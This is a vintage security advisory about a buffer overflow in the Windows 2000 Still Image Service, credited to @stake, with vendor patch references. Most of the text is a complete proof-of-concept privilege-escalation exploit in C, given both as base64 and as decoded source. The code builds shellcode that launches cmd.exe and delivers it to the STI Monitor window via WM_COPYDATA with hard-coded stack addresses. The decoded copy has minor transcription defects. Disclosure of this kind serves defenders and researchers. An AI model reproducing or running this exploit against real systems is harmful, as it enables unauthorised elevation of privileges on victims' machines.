Reported September 7, 2000 by
@stake

VERSIONS AFFECTED
  • Microsoft Windows 2000

DESCRIPTION

The Windows 2000 Still Image Service contains an unchecked buffer that could allow a user to gain elevated privileges on the system. According to Microsoft's bulletin, the Still Image Service is not installed by default, but is automatically installed when a user connects a still image device to the system. The service remains installed and continues to start each time the system is rebooted thereafter.

DEMONSTRATION

Proof-of-Concept Code provide by @stake:

--================


Content-Description: STISVC Proof Of Concept Code
Content-Disposition: attachment; filename="ownsti.cpp"
Content-Transfer-Encoding: BASE64
Content-Type: text/plain

I2luY2x1ZGU8d2luZG93cy5oPg0KDQojZGVmaW5lIEVYUFNJWkUgKDUyMCsxMDI0KQ0KLy8j
ZGVmaW5lIFNUQUNLVE9QICgweDAwNzBGRjU4KQkvLyBmb3IgU3RpU3ZjIHZlcnNpb24gNS4w
LjIxMzQuMSBpbiBXaW4ySw0KLy8jZGVmaW5lIEJVRkZFUkxPQyAoMHgwMDcwRkNCMCkNCiNk
ZWZpbmUgU1RBQ0tUT1AgKDB4MDA3MUZGNTgpCS8vIGZvciBTdGlTdmMgdmVyc2lvbiA1LjAu
MjEzNC4xIGluIFdpbjJLIFNQMQ0KI2RlZmluZSBCVUZGRVJMT0MgKDB4MDA3MUZDQjApDQoN
CmludCBXSU5BUEkgV2luTWFpbihISU5TVEFOQ0UgaEluc3QsIEhJTlNUQU5DRSBoUHJldiwg
TFBTVFIgbHBDbWRMaW5lLCBpbnQgblNob3cpDQp7DQoJY2hhciBmdW5reVtFWFBTSVpFXTsN
CgltZW1zZXQoZnVua3ksMHg5MCxFWFBTSVpFKTsNCglmdW5reVtFWFBTSVpFLTJdPShjaGFy
KTA7DQoJZnVua3lbRVhQU0laRS0xXT0oY2hhcikwOw0KDQoJLy8gV3JpdGUgY29kZQ0KDQoJ
SE1PRFVMRSBoS2VybmVsPUdldE1vZHVsZUhhbmRsZSgia2VybmVsMzIuZGxsIik7DQoNCi8v
CWZ1bmt5WzB4MF09KGNoYXIpMHhDQzsNCg0KCWZ1bmt5WzB4NF09KGNoYXIpMHg4MTsNCglm
dW5reVsweDVdPShjaGFyKTB4QzQ7DQoJZnVua3lbMHg2XT0oY2hhcikweDA0Ow0KCWZ1bmt5
WzB4N109KGNoYXIpMHhGQzsNCglmdW5reVsweDhdPShjaGFyKTB4RkY7DQoJZnVua3lbMHg5
XT0oY2hhcikweEZGOw0KDQoJZnVua3lbMHgxMF09KGNoYXIpMHhCODsNCgkqKERXT1JEICop
KCYoZnVua3lbMHgxMV0pKT1+KERXT1JEKUdldFByb2NBZGRyZXNzKGhLZXJuZWwsIldpbkV4
ZWMiKTsNCgkNCglmdW5reVsweDE1XT0oY2hhcikweEY3Ow0KIAlmdW5reVsweDE2XT0oY2hh
cikweEQwOw0KDQoJZnVua3lbMHgxN109KGNoYXIpMHg2QTsNCglmdW5reVsweDE4XT0oY2hh
cikweDAzOw0KCQ0KCWZ1bmt5WzB4MTldPShjaGFyKTB4QkI7DQoJKihEV09SRCAqKSgmKGZ1
bmt5WzB4MUFdKSk9fihEV09SRCkoQlVGRkVSTE9DKzB4MzApOw0KCQ0KCWZ1bmt5WzB4MUVd
PShjaGFyKTB4Rjc7DQoJZnVua3lbMHgxRl09KGNoYXIpMHhEMzsNCg0KCWZ1bmt5WzB4MjBd
PShjaGFyKTB4NTM7DQoNCglmdW5reVsweDIxXT0oY2hhcikweEZGOw0KCWZ1bmt5WzB4MjJd
PShjaGFyKTB4RDA7DQoJDQoJZnVua3lbMHgyM109KGNoYXIpMHhCODsNCgkqKERXT1JEICop
KCYoZnVua3lbMHgyNF0pKT1+KERXT1JEKUdldFByb2NBZGRyZXNzKGhLZXJuZWwsIkV4aXRQ
cm9jZXNzIik7DQoNCglmdW5reVsweDI4XT0oY2hhcikweEY3Ow0KCWZ1bmt5WzB4MjldPShj
aGFyKTB4RDA7DQoNCglmdW5reVsweDJBXT0oY2hhcikweEZGOw0KCWZ1bmt5WzB4MkJdPShj
aGFyKTB4RDA7DQoNCglmdW5reVsweDJDXT0oY2hhcikweENDOw0KCWZ1bmt5WzB4MkRdPShj
aGFyKTB4Q0M7DQoJZnVua3lbMHgyRV09KGNoYXIpMHhDQzsNCglmdW5reVsweDJGXT0oY2hh
cikweENDOw0KDQoJLy8gU2V0IHN0cmluZyB0byBleGVjdXRlDQoJbWVtY3B5KCYoZnVua3lb
MHgzMF0pLCJjbWQuZXhlICIsOCk7DQogDQoJLy8gU2V0IHJldHVybiBhZGRyDQoJKihEV09S
RCAqKSgmKGZ1bmt5WzB4MjA4XSkpPUJVRkZFUkxPQzsNCg0KCS8vIEdldCBOZXREREUgV2lu
ZG93DQoJSFdORCBod25kPUZpbmRXaW5kb3coIlNUSUV4ZV9XaW5kb3dfQ2xhc3MiLCJTVEkg
TW9uaXRvciIpOw0KDQoJLy8gQ29weSBleHBsb2l0IGNvZGUNCglDT1BZREFUQVNUUlVDVCBj
ZHM7DQoJY2RzLmNiRGF0YT1zaXplb2YoZnVua3kpOw0KCWNkcy5kd0RhdGE9MDsNCgljZHMu
bHBEYXRhPShQVk9JRClmdW5reTsNCg0KCVNlbmRNZXNzYWdlKGh3bmQsV01fQ09QWURBVEEs
KFdQQVJBTSlod25kLChMUEFSQU0pJmNkcyk7DQoNCglQb3N0TWVzc2FnZShod25kLDB4NENE
LDAsKExQQVJBTSkoU1RBQ0tUT1AtRVhQU0laRSkpOw0KDQoJcmV0dXJuIDA7DQp9.

--================--

Decoding the above base64-encoded file reveals the following source code:

define STACKTOP (0x0070FF58)    // for StiSvc version 5.0.2134.1 in Win2K
//#define BUFFERLOC (0x0070FCB0)
#define STACKTOP (0x0071FF58)    // for StiSvc version 5.0.2134.1 in Win2K SP1
#define BUFFERLOC (0x0071FCB0)

int WINAPI WinMain(HINSTANCE hInst, HINSTANCE hPrev, LPSTR lpCmdLine, int nShow)
\{
    char funky\[EXPSIZE\];
    memset(funky,0x90,EXPSIZE);
    funky\[EXPSIZE-2\]=(char)0;
    funky\[EXPSIZE-1\]=(char)0;

    // Write code

    HMODULE hKernel=GetModuleHandle("kernel32.dll");

//    funky\[0x0\]=(char)0xCC;

    funky\[0x4\]=(char)0x81;
    funky\[0x5\]=(char)0xC4;
    funky\[0x6\]=(char)0x04;
    funky\[0x7\]=(char)0xFC;
    funky\[0x8\]=(char)0xFF;
    funky\[0x9\]=(char)0xFF;

    funky\[0x10\]=(char)0xB8;
    *(DWORD *)(&(funky\[0x11\]))=~(DWORD)GetProcAddress(hKernel,"WinExec");
   
    funky\[0x15\]=(char)0xF7;
    funky\[0x16\]=(char)0xD0;

    funky\[0x17\]=(char)0x6A;
    funky\[0x18\]=(char)0x03;
   
    funky\[0x19\]=(char)0xBB;
    *(DWORD *)(&(funky\[0x1A\]))=~(DWORD)(BUFFERLOC+0x30);
   
    funky\[0x1E\]=(char)0xF7;
    funky\[0x1F\]=(char)0xD3;

    funky\[0x20\]=(char)0x53;

    funky\[0x21\]=(char)0xFF;
    funky\[0x22\]=(char)0xD0;
   
    funky\[0x23\]=(char)0xB8;
    *(DWORD *)(&(funky\[0x24\]))=~(DWORD)GetProcAddress(hKernel,"ExitProcess");

    funky\[0x28\]=(char)0xF7;
    funky\[0x29\]=(char)0xD0;

    funky\[0x2A\]=(char)0xFF;
    funky\[0x2B\]=(char)0xD0;

    funky\[0x2C\]=(char)0xCC;
    funky\[0x2D\]=(char)0xCC;
    funky\[0x2E\]=(char)0xCC;
    funky\[0x2F\]=(char)0xCC;

    // Set string to execute
    memcpy(&(funky\[0x30\]),"cmd.exe ",8);

    // Set return addr
    *(DWORD *)(&(funky\[0x208\]))=BUFFERLOC;

    // Get NetDDE Window
    HWND hwnd=FindWindow("STIExe_Window_Class","STI Monitor");

    // Copy exploit code
    COPYDATASTRUCT cds;
    cds.cbData=sizeof(funky);
    cds.dwData=0;
    cds.lpData=(PVOID)funky;

    SendMessage(hwnd,WM_COPYDATA,(WPARAM)hwnd,(LPARAM)&cds);

    PostMessage(hwnd,0x4CD,0,(LPARAM)(STACKTOP-EXPSIZE));

    return 0;
\}

VENDOR RESPONSE

Microsoft is aware of this problem and has issued FAQ #FQ00-065, Support Online article Q272736, and a patch to correct this matter.

CREDIT
Discovered by @stake